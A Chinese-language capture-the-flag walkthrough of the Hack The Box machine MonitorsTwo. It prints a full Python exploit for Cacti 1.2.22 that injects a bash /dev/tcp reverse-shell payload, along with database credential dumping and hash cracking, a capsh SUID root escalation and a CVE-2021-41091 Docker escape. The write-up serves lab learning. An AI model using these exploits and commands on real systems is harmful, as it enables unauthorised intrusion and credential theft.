[HTB] MonitorsTwo

First Post:

Last Update:

Word Count:
4.7k

Read Time:
24 min

lika

前言

六花可爱捏。挺简单的一台靶机,适合新手入坑尝试。

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ sudo nmap -p- --min-rate=10000 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:44 EDT
Nmap scan report for 10.10.11.211
Host is up (0.092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds

$ sudo nmap -sT -sV -sC -O -p22,80 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:45 EDT
Nmap scan report for 10.10.11.211
Host is up (0.075s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds

$ sudo nmap --script=vuln 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-18 02:45 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.11.211
Host is up (0.078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.11.211:80/include/js/dygraph-combined.js?b5b448f71f8c3eb4a39506299bd81b0c=%27%20OR%20sqlspider
|     http://10.10.11.211:80/include/js/jquery.tablesorter.pager.js?8ca32d30195c98492cd028f582f07c8c=%27%20OR%20sqlspider
|     http://10.10.11.211:80/include/js/d3.js?62b21cab0960a061cb893852bfc74cfa=%27%20OR%20sqlspider
|_    http://10.10.11.211:80/include/js/billboard.js?9a354b4a145f51a33bd39f8e5f042a23=%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /docs/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 241.70 seconds

开了22和80,看标题80应该是Cacti登录页面,其他就是扫出了一个/docs目录可以看一下,报的sql注入漏洞显然不太像,可以不用看。

whatweb

1
2
$ sudo whatweb 10.10.11.211
http://10.10.11.211 [200 OK] Cacti, Cookies[Cacti], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], HttpOnly[Cacti], IP[10.10.11.211], JQuery, PHP[7.4.33], PasswordField[login_password], Script[text/javascript], Title[Login to Cacti], UncommonHeaders[content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/7.4.33], X-UA-Compatible[IE=Edge], nginx[1.18.0]

扫出来可以看出网站是基于php的,并且nginx版本也不是最新的,可能有漏洞但是可以利用的可能性较小,懒得试了。

nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
sudo nikto -h 10.10.11.211
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.211
+ Target Hostname:    10.10.11.211
+ Target Port:        80
+ Start Time:         2023-07-18 03:03:35 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/7.4.33.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /install/install.php: Install file found.
+ /help.php: A help file was found.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8881 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2023-07-18 03:16:07 (GMT-4) (752 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto疑似扫出来不少后门或者文件包含啥的,实际上都用不了,接着往下走吧,没必要在这硬磕。

web渗透

服务识别

那就先打开网页看一眼吧。

e4048ca2cf54ab8b6b60cd1ed0c6b328

啥也没有,简简单单一个登录框,试了几个弱密码没有成功。

但是登录框底部告诉我们这是用版本号为1.2.22的Cacti搭建的。我们直接google一下看看这是个啥。在这个网页上找到了相关资料。

Cacti

Cacti 在英文中的意思是仙人掌的意思,Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。它通过snmpget来获取数据,使用 RRDtool绘画图形,而且你完全可以不需要了解RRDtool复杂的参数。它提供了非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结构、host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非常强大完善。Cacti 的发展是基于让 RRDTool 使用者更方便使用该软件,除了基本的 Snmp 流量跟系统资讯监控外,Cacti 也可外挂 Scripts 及加上 Templates 来作出各式各样的监控图。

cacti是用php语言实现的一个软件,它的主要功能是用snmp服务获取数据,然后用rrdtool储存和更新数据,当用户需要查看数据的时候用rrdtool生成图表呈现给用户。因此,snmp和rrdtool是cacti的关键。Snmp关系着数据的收集,rrdtool关系着数据存储和图表的生成。

我们大致有了一个了解,总之直接图穷匕见,搜一下cacti exploit。

Cacti RCE

exp-db上就有一个Cacti-v1.2.22的RCE利用EXP,试了一下没利用成功。另请高就,在github上又找到一个能绕过登录并执行RCE的exp。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import requests
import urllib.parse

def checkVuln():
    result = requests.get(vulnURL, headers=header)
    return (result.text != "FATAL: You are not authorized to use this service" and result.status_code == 200)

def bruteForce():
    # brute force to find host id and local data id
    for i in range(1, 5):
        for j in range(1, 10):
            vulnIdURL = f"{vulnURL}?action=polldata&poller_id=1&host_id={i}&local_data_ids[]={j}"
            result = requests.get(vulnIdURL, headers=header)
    
            if result.text != "[]":
                # print(result.text)
                rrdName = result.json()[0]["rrd_name"]
                if rrdName == "polling_time" or rrdName == "uptime":
                    return True, i, j

    return False, -1, -1


def remoteCodeExecution(payload, idHost, idLocal):
    encodedPayload = urllib.parse.quote(payload)
    injectedURL = f"{vulnURL}?action=polldata&poller_id=;{encodedPayload}&host_id={idHost}&local_data_ids[]={idLocal}"
    
    result = requests.get(injectedURL,headers=header)
    print(result.text)

if __name__ == "__main__":
    targetURL = input("Enter the target address (like 'http://123.123.123.123:8080')")
    vulnURL = f"{targetURL}/remote_agent.php"
    # X-Forwarded-For value should be something in the database of Cacti
    header = {"X-Forwarded-For": "127.0.0.1"}
    print("Checking vulnerability...")
    if checkVuln():
        print("App is vulnerable")
        isVuln, idHost, idLocal = bruteForce()
        print("Brute forcing id...")
        # RCE payload
        ipAddress = "192.168.1.15"
        ipAddress = input("Enter your IPv4 address")
        port = input("Enter the port you want to listen on")
        payload = f"bash -c 'bash -i >& /dev/tcp/{ipAddress}/{port} 0>&1'"
        if isVuln:
            print("Delivering payload...")
            remoteCodeExecution(payload, idHost, idLocal)
        else:
            print("RRD not found")
    else:
        print("Not vulnerable")

直接跑一下试试。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ python exp.py
Enter the target address (like 'http://123.123.123.123:8080')http://10.10.11.211
Checking vulnerability...
App is vulnerable
Brute forcing id...
Enter your IPv4 address <YOUR_IP>
Enter the port you want to listen on <YOUR_PORT>
Delivering payload...
<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

本地nc监听一下就拿到shell了。

1
2
3
4
5
6
$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [HTB_IP] from (UNKNOWN) [10.10.11.211] 49612
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$

提权

思路构建

然而还不能高兴太早。高高兴兴跑去home目录下找user flag就会发现home目录是空的。我们直接看一下/etc/passwd就会发现除了root没人有bash环境以及home目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
www-data@50bca5e748b0:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

为啥呢?其实看一下主机名称一段无意义字符串+没有其他用户我们不难猜出其实我们处于docker环境中。我们的反弹shell是利用Cacti的漏洞获取的,如果Cacti是部署在docker上 的,那么我们的shell是从docker反弹出来的就是自然而然的了。

那我们此时的shell毫无意义了吗?并不是,我们知道,网站部署起来要和后端交互,数据一般来说是要保存在数据库中的。并且我们的网页还是个登录页面,数据库里肯定存有用户的登录凭证,如果存在凭证复用的情况,那我们要拿到外面的shell也就有了路径。

拿到user权限

思路已经构建,那我们接下来就执行。要找数据库怎么找?当然是直接去看网页的配置文件了。我们查一下就能发现cacti的网站配置文件在/include/config.php中,那我们直接进行一个文件的看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
www-data@50bca5e748b0:/var/www/html/include$ cat config.php
cat config.php
<?php
/*
 +-------------------------------------------------------------------------+
 | Copyright (C) 2004-2020 The Cacti Group                                 |
 |                                                                         |
 | This program is free software; you can redistribute it and/or           |
 | modify it under the terms of the GNU General Public License             |
 | as published by the Free Software Foundation; either version 2          |
 | of the License, or (at your option) any later version.                  |
 |                                                                         |
 | This program is distributed in the hope that it will be useful,         |
 | but WITHOUT ANY WARRANTY; without even the implied warranty of          |
 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the           |
 | GNU General Public License for more details.                            |
 +-------------------------------------------------------------------------+
 | Cacti: The Complete RRDtool-based Graphing Solution                     |
 +-------------------------------------------------------------------------+
 | This code is designed, written, and maintained by the Cacti Group. See  |
 | about.php and/or the AUTHORS file for specific developer information.   |
 +-------------------------------------------------------------------------+
 | http://www.cacti.net/                                                   |
 +-------------------------------------------------------------------------+
*/

/*
 * Make sure these values reflect your actual database/host/user/password
 */

$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'db';
$database_username = 'root';
$database_password = 'root';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;

/*
 * When the cacti server is a remote poller, then these entries point to
 * the main cacti server. Otherwise, these variables have no use and
 * must remain commented out.
 */

#$rdatabase_type     = 'mysql';
#$rdatabase_default  = 'cacti';
#$rdatabase_hostname = 'localhost';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port     = '3306';
#$rdatabase_retries  = 5;
#$rdatabase_ssl      = false;
#$rdatabase_ssl_key  = '';
#$rdatabase_ssl_cert = '';
#$rdatabase_ssl_ca   = '';

文件的前面部分就给了我们想要的足够的信息:数据库的登录用户和密码。

那我们就高高兴兴的登录,却发现会报错。

1
2
3
4
www-data@50bca5e748b0:/sbin$ mysql -uroot -p
mysql -uroot -p
Enter password: root
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/run/mysqld/mysqld.sock' (2)

其实仔细一点就会发现,配置文件里面说明了$database_hostname = 'db';,我们要用的数据库hostname是db,要明确指定出来,否则会用默认的hostname也就是localhost,而配置文件配置了localhost为远程使用,本地登不了。指定了就能登了。

1
2
3
4
5
6
7
8
9
10
www-data@50bca5e748b0:/sbin$ mysql --host=db -uroot -proot
mysql --host=db -uroot -proot
show databases;
exit
Database
information_schema
cacti
mysql
performance_schema
sys

然而登上去了还会有问题,我们输了命令之后没回显,只有再退出时才会有回显,这是因为当前shell环境交互有问题,无法正常的交互。而且机子内没有python环境,不能生成一个交互性更好的shell。所以我们要用非交互式查询。这个平时基本上谁不用交互式啊,非交互式咋弄的请教一下chatgpt吧。

e404da7252714381deec3a5c7607473e

我们用-e选项就行。那就直接开查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
www-data@50bca5e748b0:/sbin$ mysql --host=db -uroot -proot -e "show tables" cacti
<ysql --host=db -uroot -proot -e "show tables" cacti
Tables_in_cacti
aggregate_graph_templates
aggregate_graph_templates_graph
aggregate_graph_templates_item
aggregate_graphs
aggregate_graphs_graph_item
aggregate_graphs_items
automation_devices
automation_graph_rule_items
automation_graph_rules
automation_ips
automation_match_rule_items
automation_networks
automation_processes
automation_snmp
automation_snmp_items
automation_templates
automation_tree_rule_items
automation_tree_rules
cdef
cdef_items
color_template_items
color_templates
colors
data_debug
data_input
data_input_data
data_input_fields
data_local
data_source_profiles
data_source_profiles_cf
data_source_profiles_rra
data_source_purge_action
data_source_purge_temp
data_source_stats_daily
data_source_stats_hourly
data_source_stats_hourly_cache
data_source_stats_hourly_last
data_source_stats_monthly
data_source_stats_weekly
data_source_stats_yearly
data_template
data_template_data
data_template_rrd
external_links
graph_local
graph_template_input
graph_template_input_defs
graph_templates
graph_templates_gprint
graph_templates_graph
graph_templates_item
graph_tree
graph_tree_items
host
host_graph
host_snmp_cache
host_snmp_query
host_template
host_template_graph
host_template_snmp_query
plugin_config
plugin_db_changes
plugin_hooks
plugin_realms
poller
poller_command
poller_data_template_field_mappings
poller_item
poller_output
poller_output_boost
poller_output_boost_local_data_ids
poller_output_boost_processes
poller_output_realtime
poller_reindex
poller_resource_cache
poller_time
processes
reports
reports_items
sessions
settings
settings_tree
settings_user
settings_user_group
sites
snmp_query
snmp_query_graph
snmp_query_graph_rrd
snmp_query_graph_rrd_sv
snmp_query_graph_sv
snmpagent_cache
snmpagent_cache_notifications
snmpagent_cache_textual_conventions
snmpagent_managers
snmpagent_managers_notifications
snmpagent_mibs
snmpagent_notifications_log
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
user_auth_group_realm
user_auth_perms
user_auth_realm
user_domains
user_domains_ldap
user_log
vdef
vdef_items
version

我们显然对usr_auth表感兴趣,查他

1
2
3
4
5
6
www-data@50bca5e748b0:/sbin$ mysql --host=db -uroot -proot -e "select * from user_auth" cacti
<db -uroot -proot -e "select * from user_auth" cacti
id      username        password        realm   full_name       email_address   must_change_password    password_change show_tree       show_list       show_preview   graph_settings   login_opts      policy_graphs   policy_trees    policy_hosts    policy_graph_templates  enabled lastchange      lastlogin       password_history       locked   failed_attempts lastfail        reset_perms
1       admin   $2y$10$u8Xomk2jjbuJI3MW5TudHeytPPuaWYuNs2S2bTtiD8VW0SIp2TMwe    0       Jamie Thompson  admin@monitorstwo.htb           on      on      on      on     on       2       1       1       1       1       on      -1      -1      -1              0       0       663348655
3       guest   43e9a4ab75570f5b        0       Guest Account           on      on      on      on      on      3       1       1       1       1       1              -1       -1      -1              0       0       0
4       marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.************************    0       Marcus Brune    marcus@monitorstwo.htb                  on      on      on     on       1       1       1       1       1       on      -1      -1              on      0       0       2135691668

发现3个用户的密码,丢去hashes网站去破解一下看看。

e3f6b47421264f110e37eb682eff52a1

我们发现了guest和marcus用户的密码,但是admin的没破解出来。那我们接着把admin的密码丢到john里破解一下。接着,我们用guest和marcus登录下网站,发现都登不进去,marcus密码对但是提示没权限访问。

事已至此,试试ssh。我们可以发现marcus的密钥可以成功登录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ ssh marcus@10.10.11.211
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 18 Jul 2023 08:22:44 AM UTC

  System load:                      0.02
  Usage of /:                       63.4% of 6.73GB
  Memory usage:                     19%
  Swap usage:                       0%
  Processes:                        247
  Users logged in:                  1
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.211


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


You have mail.
Last login: Tue Jul 18 08:21:07 2023 from 10.10.14.58
marcus@monitorstwo:~$

那直接在home目录下拿下user flag。

root权限

拿下了user flag自然很高兴,但是高兴之余别忘了一些细节。比如千万别养成ssh登进来就直接clear清屏的习惯。motd提示当前用户有邮件。那我们真得看看,邮件经常会泄露信息,不得不品尝。mail的目录在/var/mail。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
marcus@monitorstwo:/var/mail$ cat marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team

上来就给我们报了3个CVE。大致看了下介绍,CVE-2021-33033是linux内核漏洞的利用,我们uname -a可以看到当前内核版本是5.4,但是内核提权稳定性让我们先不去考虑它。CVE-2020-25706是cacti的xss漏洞,提权用不上,不看。CVE-2021-41091是Moby(一种docker引擎)的漏洞,我们查了一下发现可以用于提权。github上有详细的PoC介绍,那我们按照说明尝试下利用。

CVE-2021-41091

  1. 第一步是要获取docker内的root权限并将内部的/bin/bash设置s位权限。

    聪明的我们之前的反弹shell并没关。那docker内提权也还是同一个思路,先三板斧:sudo -l没权限,find / -type f -perm -04000 2>/dev/null这次支棱起来了:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    www-data@50bca5e748b0:/var/www/html$ find / -type f -perm -04000 2>/dev/null
    find / -type f -perm -04000 2>/dev/null
    /usr/bin/gpasswd
    /usr/bin/passwd
    /usr/bin/chsh
    /usr/bin/chfn
    /usr/bin/newgrp
    /sbin/capsh
    /bin/mount
    /bin/umount
    /bin/bash
    /bin/su

    我们可以发现有个capsh不是很熟悉,其他都是老演员了。我们直接去gtfobins上查capsh的户口,发现其有利用方式./capsh --gid=0 --uid=0 --,那直接来吧。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    www-data@50bca5e748b0:/var/www/html$ cd /sbin
    cd /sbin
    www-data@50bca5e748b0:/sbin$ ./capsh --gid=0 --uid=0 --
    ./capsh --gid=0 --uid=0 --
    whoami
    root
    chmod u+s /bin/bash
    ls -la /bin/bash
    -rwsr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash

    第一步搞定。

  2. 第二步就是执行我们的EXP。exp.sh直接从github复制或者下载下来都行。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    marcus@monitorstwo:/tmp$ ./exp.sh
    [!] Vulnerable to CVE-2021-41091
    [!] Now connect to your Docker container that is accessible and obtain root access !
    [>] After gaining root access execute this command (chmod u+s /bin/bash)

    Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
    [!] Available Overlay2 Filesystems:
    /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
    /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

    [!] Iterating over the available Overlay2 filesystems !
    [?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
    [x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

    [?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
    [!] Rooted !
    [>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
    [?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

    [!] Spawning Shell
    bash-5.1# exit
    marcus@monitorstwo:/tmp$ cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
    marcus@monitorstwo:/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged$ ./bin/bash -p
    bash-5.1# whoami
    root
    bash-5.1#  cd /root
    bash-5.1# ls -la
    total 36
    drwx------  6 root root 4096 Mar 22 13:21 .
    drwxr-xr-x 19 root root 4096 Mar 22 13:21 ..
    lrwxrwxrwx  1 root root    9 Jan 20  2021 .bash_history -> /dev/null
    -rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
    drwx------  2 root root 4096 Mar 22 13:21 .cache
    drwxr-xr-x  2 root root 4096 Mar 22 13:21 cacti
    drwxr-xr-x  3 root root 4096 Mar 22 13:21 .local
    -rw-r--r--  1 root root  161 Dec  5  2019 .profile
    -rw-r-----  1 root root   33 Jul 18 05:27 root.txt
    drwx------  2 root root 4096 Mar 22 13:21 .ssh

    成功拿下root flag!

总结

总体还是比较简单,没啥特别卡人的点,比较友好。